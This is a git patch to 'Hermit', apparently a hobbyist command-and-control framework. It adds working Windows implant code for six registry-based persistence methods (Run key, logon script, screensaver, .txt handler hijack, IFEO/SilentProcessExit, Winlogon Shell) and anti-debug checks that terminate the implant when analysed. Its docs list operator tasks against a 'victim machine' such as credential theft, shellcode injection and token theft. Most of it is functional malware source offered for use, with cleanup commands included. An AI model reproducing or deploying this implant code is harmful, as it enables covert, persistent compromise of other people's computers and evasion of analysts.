From d401b2c5aafe1219810512bc3f848250a57f7221 Mon Sep 17 00:00:00 2001 From: hdks Date: Mon, 13 May 2024 01:12:59 +0900 Subject: [PATCH] Add other persistence techniques for implant. --- README.md | 8 +- docs/guides/task.md | 174 ++++++++- docs/index.md | 8 +- docs/tutorials/simple-dll-injection.md | 4 +- docs/tutorials/simple-implant-beacon.md | 20 +- payload/win/implant/CMakeLists.txt | 10 +- payload/win/implant/include/core/procs.hpp | 16 +- .../win/implant/include/core/technique.hpp | 11 + payload/win/implant/include/hermit.hpp | 1 + payload/win/implant/script/calc_api_hash.py | 2 + payload/win/implant/src/core/procs.cpp | 10 +- payload/win/implant/src/core/task/persist.cpp | 214 ++++++++++- .../implant/src/core/technique/anti_debug.cpp | 39 ++ payload/win/implant/src/hermit.cpp | 13 + payload/win/implant/src/main/beacon_dll.cpp | 5 + payload/win/implant/src/main/beacon_exe.cpp | 5 + payload/win/loader/CMakeLists.txt | 10 +- payload/win/loader/include/core/procs.hpp | 8 + payload/win/loader/include/core/technique.hpp | 11 + payload/win/loader/script/calc_api_hash.py | 2 + payload/win/loader/src/core/procs.cpp | 56 +-- .../loader/src/core/technique/anti_debug.cpp | 39 ++ payload/win/loader/src/hermit.cpp | 25 +- pkg/client/rpc/request.go | 2 + pkg/common/parser/amtaskcommand.go | 6 +- pkg/common/wizard/payload.go | 26 ++ pkg/protobuf/rpcpb/rpc.pb.go | 348 +++++++++--------- pkg/protobuf/rpcpb/rpc.proto | 2 + pkg/server/payload/implant.go | 4 + pkg/server/payload/loader.go | 4 + pkg/server/rpc/grpc.go | 2 + 31 files changed, 842 insertions(+), 243 deletions(-) create mode 100644 payload/win/implant/src/core/technique/anti_debug.cpp create mode 100644 payload/win/loader/src/core/technique/anti_debug.cpp diff --git a/README.md b/README.md index a57fc8e..f9c9785 100644 --- a/README.md +++ b/README.md @@ -19,8 +19,12 @@ I'm developing this for my learning purpose. - gRPC server/client for operations. - TLS for secure communication between the C2 server, client and agents. - HTTPS listener. -- Multi staged payloads. -- SQLite for the data persistence. +- Multi-Staged Payload +- Data Encryption. +- Common Evasion Techniques +- Common Persistence Techniques +- Anti-Debug +- SQLite for saving data
diff --git a/docs/guides/task.md b/docs/guides/task.md index 9388299..89be43e 100644 --- a/docs/guides/task.md +++ b/docs/guides/task.md @@ -7,18 +7,19 @@ Currently, the following tasks are available: ```txt TASK: + assembly Load and execute .NET assembly. cat Read contents of a file. cd Change the working directory. + cmd Execute arbitrary system command. connect Change listener URL to connect. cp Copy a file. creds steal Steal credentials from various resources on the target computer - dll Load DLL and inject modules into the specified process + dll Load DLL and inject modules into the specified process. download Download a file. env ls List environment variables. envs alias for 'env ls' - execute Execute system command. group ls List local groups. - groups Alias for 'group ls' + groups Alias for 'group ls'. history Retrieve information from history files of applications ip Print the network interface information on target computer jitter Set jitter time (seconds) between requests from beacon @@ -30,6 +31,8 @@ TASK: mkdir Create a new directory. mv Move a file to a destination location. net Get TCP connections. + pe Load and execute PE (Portable Executable) file. + persist Establish persistence for implant. procdump Dump process memory to a specified output file. ps kill Terminate a process. ps ls List processes. @@ -42,13 +45,13 @@ TASK: rportfwd rm Stop and remove listener for reverse port forwarding. runas Execute a program as another user. screenshot Take a screenshot on target computer. - shellcode Inject shellcode into the specified process - sleep Set sleep time (seconds) between requests from beacon + shellcode Inject shellcode into the specified process. + sleep Set sleep time (seconds) between requests from beacon. token revert Revert back to the original process token. token steal Steal token from the specified process and impersonate process. upload Upload a file to the target computer. user ls List users. - users List all local users. + users Alias for 'user ls'. whoami Print the current user information. ``` @@ -78,6 +81,14 @@ Or you can use a normal slash (`/`) instead of a backslash: Hermit [agent-abcd] > cd "C:/Program Files/" ``` +## `cmd` + +Executes an arbitrary system command. + +```sh +Hermit [agent-abcd] > cmd "dir -Force" +``` + ## `connect` Changes the connected listener URL to new one. @@ -101,7 +112,9 @@ Hermit [agent-abcd] > cp /tmp/example.txt ./example.txt Injects DLL into specified process. ```sh -Hermit [agent-abcd] > dll --pid 1234 --dll /path/to/example.dll +# -p: target process ID +# -f: a DLL file path +Hermit [agent-abcd] > dll -p 1234 -f /path/to/example.dll ``` To see running processes and check PIDs, use `ps ls` task. @@ -120,13 +133,11 @@ Hermit [agent-abcd] > download C:/Users/John/Desktop/example.txt /tmp/example.tx Lists environment variables in victim machine. -## `execute` +## `group` -Executes system command in victim machine. +### `group ls`, `groups` -```sh -Hermit [agent-abcd] > execute notepad.exe -``` +Lists local groups in victim machine. ## `jitter` @@ -159,6 +170,10 @@ Specify in **UTC**. And the format is such like `2025-01-01 00:00:00`. Hermit [agent-abcd] > killdate 2025-01-01 06:01:20 ``` +## `ls` + +Lists files in current working directory in victim machine. + ## `migrate` Migrates the implant to another process. @@ -170,6 +185,14 @@ Hermit [agent-abcd] > migrate 1234 To see running processes and PIDs, use `ps ls` task. +## `mkdir` + +Creates a new directory in current working directory in victim machine. + +```sh +Hermit [agent-abcd] > mkdir new_dir +``` + ## `mv` Move a file to specified place. @@ -178,17 +201,101 @@ Move a file to specified place. Hermit [agent-abcd] > mv ./example.txt C:/Users/John/Documents/example.txt ``` +## `net` + +Prints open ip/ports. + +## `pe` + +Loads and executes a Portable Executable (`.exe`) file. + +```sh +# -f: an executable file path +Hermit [agent-abcd] > pe -f /path/to/example.exe +``` + ## `persist` Make the implant persistence. -After running `persist` command, we can select the technique. ```sh Hermit [agent-abcd] > persist ``` -- **registry/runkey** - Add the entry (the implant file path) to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`. +We can select the persistence technique in wizard. + +### Technique 1: `runkey` + +Add an entry (the implant path) to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`. +The implant will run every time the victim machine starts. + +Cleanup: + +```powershell title="Windows Victim Machine" +Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "RandomName" +``` + +Replace the `RandomName` with the actual name which is randomly generated strings. To see the name, check with **Registry Editor (regedit)**. + +### Technique 2: `user-init-mpr-logon-script` + +Uses `UserInitMprLogonScript`. +Add an entry (the imaplant path) to `HKCU\Environment`. +The implant will run every time a user logs in. + +Cleanup: + +```powershell title="Windows Victim Machine" +Remove-ItemProperty -Path "HKCU:\Environment" -Name "UserInitMprLogonScript" +``` + +### Technique 3: `screensaver` + +Add an entry (the implant path) to `HKCU\Control Panel\Desktop`. +The implant will run after a period of user inactivity. + +Cleanup: + +```powershell title="Windows Victim Machine" +Remove-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name 'ScreenSaveTimeOut' +Remove-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name 'SCRNSAVE.EXE' +``` + +### Technique 4: `default-file-extension-hijacking` + +Update an entry for `HKEY_CLASSES_ROOT\txtfile\shell\open\command`. +Overwrite the default application when clicking a `.txt` file. It's required to **Administrator** privilege. + +Cleanup: + +```powershell title="Windows Victim Machine" +reg add "HKEY_CLASSES_ROOT\txtfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "%SystemRoot%\system32\NOTEPAD.EXE %1" +``` + +### Technique 5: `ifeo` + +Uses **Image File Execution Options**. +Write entries for `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe` and `HKLM\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe`. +It's required to **Administrator** privilege. + +Cleanup: + +```powershell title="Windows Victim Machine" +Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" -Name 'GlobalFlag' +Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" -Name 'ReportingMode' +Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" -Name 'MonitorProcess' +``` + +### Technique 6: `winlogon` + +Add an entry (the implant path) to `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon`. +The implant will run every time a user logs on. It's required to **Administrator** privilege. + +Cleanup: + +```powershell title="Windows Victim Machine" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "explorer.exe" /f +``` ## `procdump` @@ -218,6 +325,10 @@ Hermit [agent-abcd] > ps kill 1234 Lists all running processes. +## `pwd` + +Prints the current working directory. + ## `reg` Manages registy keys. @@ -230,6 +341,26 @@ Retrieve registry values. For recursively, add `-r` flag. Hermit [agent-abcd] > reg query "HKLM\\SOFTWARE\\Microsoft" -r ``` +## `rm` + +Removes a file. + +```sh +Hermit [agent-abcd] > rm example.txt +``` + +## `rmdir` + +Removes a directory. + +```sh +Hermit [agent-abcd] > rmdir example_dir +``` + +## `rportfwd` + +Under development. + ## `runas` Runs a command as another user. @@ -253,7 +384,9 @@ After successful, the captured image file is saved under `$HOME/.hermit/server/a Injects shellcode to specified process. ```sh -Hermit [agent-abcd] > shellcode --pid 1234 -s /path/to/shellcode.bin +# -p: target process ID +# -f: a shellcode file path +Hermit [agent-abcd] > shellcode -p 1234 -f /path/to/shellcode.bin ``` To see running processes and PIDs, use `ps ls` task. @@ -306,8 +439,13 @@ Lists local users. ## `whoami` Prints current user information on victim machine. -To print the privileges, add `--priv` flag. ```sh Hermit [agent-abcd] > whoami -``` \ No newline at end of file +``` + +To print the privileges, add `--priv` flag. + +```sh +Hermit [agent-abcd] > whoami --priv +``` diff --git a/docs/index.md b/docs/index.md index 3a7296c..e2d3b3e 100644 --- a/docs/index.md +++ b/docs/index.md @@ -12,8 +12,12 @@ Hermit is a command and control framework written in Go. - gRPC server/client for operations. - TLS for secure communication between the C2 server, client and agents. - HTTPS listener. -- Multi staged payloads. -- SQLite for the data persistence. +- Multi-Staged Payload +- Data Encryption. +- Common Evasion Techniques +- Common Persistence Techniques +- Anti-Debug +- SQLite for saving data ![diagram](assets/diagram.png) diff --git a/docs/tutorials/simple-dll-injection.md b/docs/tutorials/simple-dll-injection.md index 1a2283c..28b3f5b 100644 --- a/docs/tutorials/simple-dll-injection.md +++ b/docs/tutorials/simple-dll-injection.md @@ -1,9 +1,11 @@ # Simple DLL Injection -In this tutorial, we generate **DLL Implant** and **Loader** which loads the DLL into memory on Windows victim machine. Then make the C2 agent to communicate with our C2 server. +In this tutorial, we generate **DLL Implant** and **Loader** which loads the DLL into memory on Windows victim machine. Then make the C2 agent to communicate with our C2 server. Assume that you've completed [the Simple Implant Beacon tutorial](./simple-implant-beacon.md). +> IMPORTANT: It's heavily recommended to use **a virtual machine** for Windows victim machine because If we modify the registry etc., the system might not work properly. + ## 1. Start C2 Server In the Hermit project root, start the C2 server: diff --git a/docs/tutorials/simple-implant-beacon.md b/docs/tutorials/simple-implant-beacon.md index 34aca6c..edf37e8 100644 --- a/docs/tutorials/simple-implant-beacon.md +++ b/docs/tutorials/simple-implant-beacon.md @@ -5,6 +5,8 @@ This page introduces the basic usage of execute the implant beacon on Windows vi Assume that you've already installed Hermit. If not yet, see [the Installation page](../installation.md) and try [Getting Started](../getting-started.md). +> IMPORTANT: It's heavily recommended to use **a virtual machine** for Windows victim machine because If we modify the registry etc., the system might not work properly. + ## 1. Start C2 Server Go to the Hermit project directory then run `./hermit` command. @@ -73,18 +75,19 @@ Currently, the following tasks are available: ```txt title="Hermit C2 Server Console [Agent Mode]" TASK: + assembly Load and execute .NET assembly. cat Read contents of a file. cd Change the working directory. + cmd Execute arbitrary system command. connect Change listener URL to connect. cp Copy a file. creds steal Steal credentials from various resources on the target computer - dll Load DLL and inject modules into the specified process + dll Load DLL and inject modules into the specified process. download Download a file. env ls List environment variables. envs alias for 'env ls' - execute Execute system command. group ls List local groups. - groups Alias for 'group ls' + groups Alias for 'group ls'. history Retrieve information from history files of applications ip Print the network interface information on target computer jitter Set jitter time (seconds) between requests from beacon @@ -96,12 +99,13 @@ TASK: mkdir Create a new directory. mv Move a file to a destination location. net Get TCP connections. + pe Load and execute PE (Portable Executable) file. + persist Establish persistence for implant. procdump Dump process memory to a specified output file. ps kill Terminate a process. ps ls List processes. pwd Print the current working directory. - reg subkeys Enumerate subkeys for the specified open registry key. - reg values Enumerate the specified registry values. + reg query Enumerate subkeys for the specified path. rm Remove a file. rmdir Remove a directory. rportfwd add Add settings to reverse port forwarding. @@ -109,13 +113,13 @@ TASK: rportfwd rm Stop and remove listener for reverse port forwarding. runas Execute a program as another user. screenshot Take a screenshot on target computer. - shellcode Inject shellcode into the specified process - sleep Set sleep time (seconds) between requests from beacon + shellcode Inject shellcode into the specified process. + sleep Set sleep time (seconds) between requests from beacon. token revert Revert back to the original process token. token steal Steal token from the specified process and impersonate process. upload Upload a file to the target computer. user ls List users. - users List all local users. + users Alias for 'user ls'. whoami Print the current user information. ``` diff --git a/payload/win/implant/CMakeLists.txt b/payload/win/implant/CMakeLists.txt index 51d2ab6..3f6d851 100644 --- a/payload/win/implant/CMakeLists.txt +++ b/payload/win/implant/CMakeLists.txt @@ -32,6 +32,9 @@ add_compile_definitions(PAYLOAD_TYPE=${PAYLOAD_TYPE}) if(${PAYLOAD_INDIRECT_SYSCALLS} STREQUAL "true") add_compile_definitions(PAYLOAD_INDIRECT_SYSCALLS=${PAYLOAD_INDIRECT_SYSCALLS}) endif() +if(${PAYLOAD_ANTI_DEBUG} STREQUAL "true") + add_compile_definitions(PAYLOAD_ANTI_DEBUG=${PAYLOAD_ANTI_DEBUG}) +endif() add_compile_definitions(LISTENER_PROTOCOL=${LISTENER_PROTOCOL}) add_compile_definitions(LISTENER_HOST=${LISTENER_HOST}) add_compile_definitions(LISTENER_PORT=${LISTENER_PORT}) @@ -74,9 +77,6 @@ set(SOURCE_CORE src/core/system/process.cpp src/core/system/registry.cpp src/core/system/user.cpp - src/core/technique/injection/dll_injection.cpp - src/core/technique/injection/pe_injection.cpp - src/core/technique/injection/shellcode_injection.cpp src/core/task/assembly.cpp src/core/task/cat.cpp src/core/task/cd.cpp @@ -116,6 +116,10 @@ set(SOURCE_CORE src/core/task/upload.cpp src/core/task/user.cpp src/core/task/whoami.cpp + src/core/technique/anti_debug.cpp + src/core/technique/injection/dll_injection.cpp + src/core/technique/injection/pe_injection.cpp + src/core/technique/injection/shellcode_injection.cpp src/core/utils/convert.cpp src/core/utils/random.cpp src/core/utils/split.cpp diff --git a/payload/win/implant/include/core/procs.hpp b/payload/win/implant/include/core/procs.hpp index 7cf3e19..a76a38a 100644 --- a/payload/win/implant/include/core/procs.hpp +++ b/payload/win/implant/include/core/procs.hpp @@ -60,10 +60,12 @@ #define APIHASH_RTLSTRINGCCHCOPYW 0x32231e60 #define APIHASH_RTLSTRINGCCHLENGTHW 0x28821d8f #define APIHASH_RTLZEROMEMORY 0x899c0d1e +#define APIHASH_CHECKREMOTEDEBUGGERPRESENT 0x478dd921 #define APIHASH_CLOSEHANDLE 0x47bdd9cb #define APIHASH_CREATETHREADPOOLWAIT 0x7a8370ac #define APIHASH_DLLMAIN 0xe2e2f348 #define APIHASH_GETPROCADDRESS 0xafa3e09d +#define APIHASH_ISDEBUGGERPRESENT 0xef4ed1b #define APIHASH_LOADLIBRARYA 0x7069f241 #define APIHASH_LOADLIBRARYW 0x7069f257 #define APIHASH_MESSAGEBOXA 0xcc4a1d08 @@ -210,12 +212,16 @@ namespace Procs // **WINAPIs** - // DllMain - typedef BOOL (WINAPI* LPPROC_DLLMAIN)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved); + // CheckRemoteDebuggerPresent + typedef BOOL (WINAPI* LPPROC_CHECKREMOTEDEBUGGERPRESENT)(HANDLE hProcess, PBOOL pbDebuggerPresent); // CloseHandle typedef BOOL (WINAPI* LPPROC_CLOSEHANDLE)(HANDLE hObject); + // DllMain + typedef BOOL (WINAPI* LPPROC_DLLMAIN)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved); // GetProcAddress typedef FARPROC (WINAPI* LPPROC_GETPROCADDRESS)(HMODULE hModule, LPCSTR lpProcName); + // IsDebuggerPresent + typedef BOOL (WINAPI* LPPROC_ISDEBUGGERPRESENT)(); // LoadLibraryA typedef HMODULE (WINAPI* LPPROC_LOADLIBRARYA)(LPCSTR lpLibFileName); // LoadLibraryW @@ -259,7 +265,7 @@ namespace Procs struct PROCS { - // **NATIVE APIs** + // **NTAPI** LPPROC_NTADJUSTPRIVILEGESTOKEN lpNtAdjustPrivilegesToken = nullptr; LPPROC_NTALLOCATEVIRTUALMEMORY lpNtAllocateVirtualMemory = nullptr; LPPROC_NTCLOSE lpNtClose = nullptr; @@ -307,7 +313,9 @@ namespace Procs LPPROC_RTLSTRINGCCHLENGTHW lpRtlStringCchLengthW = nullptr; LPPROC_RTLZEROMEMORY lpRtlZeroMemory = nullptr; - // **WINAPIs** + // **WINAPI** + LPPROC_CHECKREMOTEDEBUGGERPRESENT lpCheckRemoteDebuggerPresent = nullptr; + LPPROC_ISDEBUGGERPRESENT lpIsDebuggerPresent = nullptr; LPPROC_QUERYFULLPROCESSIMAGENAMEW lpQueryFullProcessImageNameW = nullptr; LPPROC_SETFILEINFORMATIONBYHANDLE lpSetFileInformationByHandle = nullptr; LPPROC_WINHTTPCLOSEHANDLE lpWinHttpCloseHandle = nullptr; diff --git a/payload/win/implant/include/core/technique.hpp b/payload/win/implant/include/core/technique.hpp index aec920e..a32cfaf 100644 --- a/payload/win/implant/include/core/technique.hpp +++ b/payload/win/implant/include/core/technique.hpp @@ -16,6 +16,17 @@ typedef BOOL (WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID); #define DEREF_16(name)*(WORD *)(name) #define DEREF_8(name)*(BYTE *)(name) +// Used for Anti-Debug +#define FLG_HEAP_ENABLE_TAIL_CHECK 0x10 +#define FLG_HEAP_ENABLE_FREE_CHECK 0x20 +#define FLG_HEAP_VALIDATE_PARAMETERS 0x40 +#define NT_GLOBAL_FLAG_DEBUGGED (FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS) + +namespace Technique::AntiDebug +{ + VOID StopIfDebug(Procs::PPROCS pProcs); +} + namespace Technique::Injection::Helper { DWORD Rva2Offset(DWORD dwRva, UINT_PTR uBaseAddr); diff --git a/payload/win/implant/include/hermit.hpp b/payload/win/implant/include/hermit.hpp index b4f1094..03ad738 100644 --- a/payload/win/implant/include/hermit.hpp +++ b/payload/win/implant/include/hermit.hpp @@ -13,6 +13,7 @@ namespace Hermit INT nCmdShow, LPCWSTR lpPayloadType, BOOL bIndirectSyscalls, + BOOL bAntiDebug, LPCWSTR lpProtocol, LPCWSTR lpHost, INTERNET_PORT nPort, diff --git a/payload/win/implant/script/calc_api_hash.py b/payload/win/implant/script/calc_api_hash.py index 000abec..8fb8f44 100644 --- a/payload/win/implant/script/calc_api_hash.py +++ b/payload/win/implant/script/calc_api_hash.py @@ -53,10 +53,12 @@ "RtlZeroMemory", # WINAPIS + "CheckRemoteDebuggerPresent", "CloseHandle", "CreateThreadpoolWait", "DllMain", "GetProcAddress", + "IsDebuggerPresent", "LoadLibraryA", "LoadLibraryW", "MessageBoxA", diff --git a/payload/win/implant/src/core/procs.cpp b/payload/win/implant/src/core/procs.cpp index cf82d16..d441b84 100644 --- a/payload/win/implant/src/core/procs.cpp +++ b/payload/win/implant/src/core/procs.cpp @@ -60,7 +60,7 @@ namespace Procs ) { PPROCS pProcs = new PROCS; - // NT APIs + // NTAPI PVOID pNtAdjustPrivilegesToken = GetProcAddressByHash(hNTDLL, APIHASH_NTADJUSTPRIVILEGESTOKEN); pProcs->lpNtAdjustPrivilegesToken = reinterpret_cast(pNtAdjustPrivilegesToken); PVOID pNtAllocateVirtualMemory = GetProcAddressByHash(hNTDLL, APIHASH_NTALLOCATEVIRTUALMEMORY); @@ -148,9 +148,13 @@ namespace Procs PVOID pRtlZeroMemory = GetProcAddressByHash(hNTDLL, APIHASH_RTLZEROMEMORY); pProcs->lpRtlZeroMemory = reinterpret_cast(pRtlZeroMemory); - // WINAPIs + // WINAPI + PVOID pCheckRemoteDebuggerPresent = GetProcAddressByHash(hKernel32DLL, APIHASH_CHECKREMOTEDEBUGGERPRESENT); + pProcs->lpCheckRemoteDebuggerPresent = reinterpret_cast(pCheckRemoteDebuggerPresent); + PVOID pIsDebuggerPresent = GetProcAddressByHash(hKernel32DLL, APIHASH_ISDEBUGGERPRESENT); + pProcs->lpIsDebuggerPresent = reinterpret_cast(pIsDebuggerPresent); PVOID pQueryFullProcessImageNameW = GetProcAddressByHash(hKernel32DLL, APIHASH_QUERYFULLPROCESSIMAGENAMEW); - pProcs->lpQueryFullProcessImageNameW = reinterpret_cast(GetProcAddress(hKernel32DLL, "QueryFullProcessImageNameW")); + pProcs->lpQueryFullProcessImageNameW = reinterpret_cast(pQueryFullProcessImageNameW); PVOID pSetFileInformationByHandle = GetProcAddressByHash(hKernel32DLL, APIHASH_SETFILEINFORMATIONBYHANDLE); pProcs->lpSetFileInformationByHandle = reinterpret_cast(pSetFileInformationByHandle); PVOID pWinHttpCloseHandle = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPCLOSEHANDLE); diff --git a/payload/win/implant/src/core/task/persist.cpp b/payload/win/implant/src/core/task/persist.cpp index 20bad29..030e39d 100644 --- a/payload/win/implant/src/core/task/persist.cpp +++ b/payload/win/implant/src/core/task/persist.cpp @@ -12,15 +12,15 @@ namespace Task return L"Error: Failed to get the program path."; } + LPCWSTR lpSelfPath = wSelfPath; + + // Persistence process if (wcscmp(wTechnique.c_str(), L"runkey") == 0) { - // Add an entry to Registry Run. HKEY hKey; std::wstring wSubKey = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run"; std::wstring wValue = Utils::Random::RandomString(8); - LPCWSTR lpData = wSelfPath; - LONG result = RegOpenKeyExW( HKEY_CURRENT_USER, wSubKey.c_str(), @@ -29,26 +29,67 @@ namespace Task &hKey ); if (result != ERROR_SUCCESS) + { return L"Error: Failed to open key."; + } result = RegSetValueExW( hKey, wValue.c_str(), 0, REG_SZ, - (BYTE*)lpData, - (wcslen(lpData) + 1) * sizeof(WCHAR) + (BYTE*)lpSelfPath, + (wcslen(lpSelfPath) + 1) * sizeof(WCHAR) + ); + RegCloseKey(hKey); + + if (result == ERROR_SUCCESS) + { + return L"Success: The entry has been set to HKCU\\" + wSubKey + L"."; + } + else + { + return L"Error: Failed to set value to registry."; + } + } + else if (wcscmp(wTechnique.c_str(), L"user-init-mpr-logon-script") == 0) + { + HKEY hKey; + std::wstring wSubKey = L"Environment"; + + LONG result = RegOpenKeyExW( + HKEY_CURRENT_USER, + wSubKey.c_str(), + 0, + KEY_SET_VALUE, + &hKey + ); + if (result != ERROR_SUCCESS) + { + return L"Error: Failed to open key."; + } + + result = RegSetValueExW( + hKey, + L"UserInitMprLogonScript", + 0, + REG_SZ, + (BYTE*)lpSelfPath, + (wcslen(lpSelfPath) + 1) * sizeof(WCHAR) ); RegCloseKey(hKey); if (result == ERROR_SUCCESS) + { return L"Success: The entry has been set to HKCU\\" + wSubKey + L"."; + } else + { return L"Error: Failed to set value to registry."; + } } else if (wcscmp(wTechnique.c_str(), L"screensaver") == 0) { - // Write entries for screensaver. // Reference: https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html HKEY hKey; std::wstring wSubKey = L"Control Panel\\Desktop"; @@ -109,6 +150,167 @@ namespace Task RegCloseKey(hKey); return L"Success: The entry has been set to HKCU\\" + wSubKey + L"."; } + else if (wcscmp(wTechnique.c_str(), L"default-file-extension-hijacking") == 0) + { + HKEY hKey; + std::wstring wSubKey = L"txtfile\\shell\\open\\command"; + + LONG result = RegOpenKeyExW( + HKEY_CLASSES_ROOT, + wSubKey.c_str(), + 0, + KEY_WRITE, + &hKey + ); + if (result != ERROR_SUCCESS) + { + return L"Error: Failed to open key."; + } + + result = RegSetValueExW( + hKey, + L"", + 0, + REG_SZ, + (BYTE*)lpSelfPath, + (wcslen(lpSelfPath) + 1) * sizeof(WCHAR) + ); + RegCloseKey(hKey); + + if (result == ERROR_SUCCESS) + { + return L"Success: The entry has been set to HKCR\\" + wSubKey + L"."; + } + else + { + return L"Error: Failed to set value to registry."; + } + } + else if (wcscmp(wTechnique.c_str(), L"ifeo") == 0) + { + // Reference: https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html + HKEY hKey; + DWORD dwGF = 512; + DWORD dwRM = 1; + + const WCHAR* wImg = L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe"; + const WCHAR* wSilent = L"Software\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe"; + + // GlobalFlag + if (RegCreateKeyExW( + HKEY_LOCAL_MACHINE, + wImg, + 0, + nullptr, + REG_OPTION_NON_VOLATILE, + KEY_WRITE | KEY_QUERY_VALUE, + nullptr, + &hKey, + nullptr + ) != ERROR_SUCCESS) + { + return L"Error: Failed to create key: Image File Execution Options\\notepad.exe."; + } + + if (RegSetValueExW( + hKey, + L"GlobalFlag", + 0, + REG_DWORD, + (const BYTE*)&dwGF, + sizeof(dwGF) + ) != ERROR_SUCCESS) + { + RegCloseKey(hKey); + return L"Error: Failed to set key."; + } + RegCloseKey(hKey); + + if (RegCreateKeyExW( + HKEY_LOCAL_MACHINE, + wSilent, + 0, + nullptr, + REG_OPTION_NON_VOLATILE, + KEY_WRITE | KEY_QUERY_VALUE, + nullptr, + &hKey, + nullptr + ) != ERROR_SUCCESS) + { + RegCloseKey(hKey); + return L"Error: Failed to create key: SilentProcessExit\\notepad.exe."; + } + + if (RegSetValueExW( + hKey, + L"ReportingMode", + 0, + REG_DWORD, + (const BYTE*)&dwRM, + sizeof(dwRM) + ) != ERROR_SUCCESS) + { + RegCloseKey(hKey); + return L"Error: Failed to set ReportingMode."; + } + if (RegSetValueExW( + hKey, + L"MonitorProcess", + 0, + REG_SZ, + (BYTE*)lpSelfPath, + (wcslen(lpSelfPath) + 1) * sizeof(WCHAR) + ) != ERROR_SUCCESS) + { + RegCloseKey(hKey); + return L"Error: Failed to set MonitorProcess."; + } + + RegCloseKey(hKey); + return L"Success: The entry has been set to HKLM\\" + std::wstring(wImg) + L" and HKLM\\" + std::wstring(wSilent) + L"."; + } + else if (wcscmp(wTechnique.c_str(), L"winlogon") == 0) + { + HKEY hKey; + std::wstring wSubKey = L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"; + std::wstring wValue = Utils::Random::RandomString(8); + + LONG result = RegOpenKeyExW( + HKEY_LOCAL_MACHINE, + wSubKey.c_str(), + 0, + KEY_WRITE, + &hKey + ); + if (result != ERROR_SUCCESS) + { + return L"Error: Failed to open key."; + } + + std::wstring wExecutables = L"explorer.exe," + std::wstring(wSelfPath); + LPCWSTR lpExecutables = wExecutables.c_str(); + Stdout::DisplayMessageBoxW(lpExecutables, L"lpExecutables"); + + result = RegSetValueExW( + hKey, + L"Shell", + 0, + REG_SZ, + (BYTE*)lpExecutables, + (wcslen(lpExecutables) + 1) * sizeof(WCHAR) + ); + RegCloseKey(hKey); + + if (result == ERROR_SUCCESS) + { + return L"Success: The entry has been set to HKLM\\" + wSubKey + L"."; + } + else + { + return L"Error: Failed to set value to registry."; + } + } else { return L"Not implemented yet."; diff --git a/payload/win/implant/src/core/technique/anti_debug.cpp b/payload/win/implant/src/core/technique/anti_debug.cpp new file mode 100644 index 0000000..d40c7dc --- /dev/null +++ b/payload/win/implant/src/core/technique/anti_debug.cpp @@ -0,0 +1,39 @@ +#include "core/technique.hpp" + +namespace Technique::AntiDebug +{ + // Reference: + // https://evasions.checkpoint.com/src/Anti-Debug/techniques/debug-flags.html + VOID StopIfDebug(Procs::PPROCS pProcs) + { + // 1. Check with IsDebuggerPresent + if (pProcs->lpIsDebuggerPresent()) + { + ExitProcess(-1); + } + + // 2. Check with CheckRemoteDebuggerPresent + BOOL bRemoteDebuggerPresent; + if (pProcs->lpCheckRemoteDebuggerPresent( + NtCurrentProcess(), + &bRemoteDebuggerPresent + ) && bRemoteDebuggerPresent) + { + ExitProcess(-1); + } + + // 3. Check with NtGlobalFlag + #ifdef _WIN64 + PPEB pPeb = (PPEB)__readgsqword(0x60); + DWORD dwNtGlobalFlag = *(PDWORD)((PBYTE)pPeb + 0xBC); + #else + PPEB pPeb = (PPEB)__readgsqword(0x30); + DWORD dwNtGlobalFlag = *(PDWORD)((PBYTE)pPeb + 0x68); + #endif + + if (dwNtGlobalFlag & NT_GLOBAL_FLAG_DEBUGGED) + { + ExitProcess(-1); + } + } +} \ No newline at end of file diff --git a/payload/win/implant/src/hermit.cpp b/payload/win/implant/src/hermit.cpp index caf10e0..b5d243d 100644 --- a/payload/win/implant/src/hermit.cpp +++ b/payload/win/implant/src/hermit.cpp @@ -7,6 +7,7 @@ namespace Hermit INT nCmdShow, LPCWSTR lpPayloadType, BOOL bIndirectSyscalls, + BOOL bAntiDebug, LPCWSTR lpProtocol, LPCWSTR lpHost, INTERNET_PORT nPort, @@ -69,6 +70,12 @@ namespace Hermit // pState->pSocket = NULL; pState->bQuit = FALSE; + // Anti-Debug + if (bAntiDebug) + { + Technique::AntiDebug::StopIfDebug(pState->pProcs); + } + // Get system information std::wstring wInfoJson = Handler::GetInitialInfoJSON(pState); @@ -88,10 +95,14 @@ namespace Hermit Utils::Random::RandomSleep(pState->nSleep, pState->nJitter); if (Handler::IsKillDateReached(pState->nKillDate)) + { pState->bQuit = TRUE; + } if (Handler::CheckIn(pState, wInfoJson)) + { break; + } } while (1 == 1); // Tasks @@ -100,7 +111,9 @@ namespace Hermit Utils::Random::RandomSleep(pState->nSleep, pState->nJitter); if (Handler::IsKillDateReached(pState->nKillDate)) + { pState->bQuit = TRUE; + } 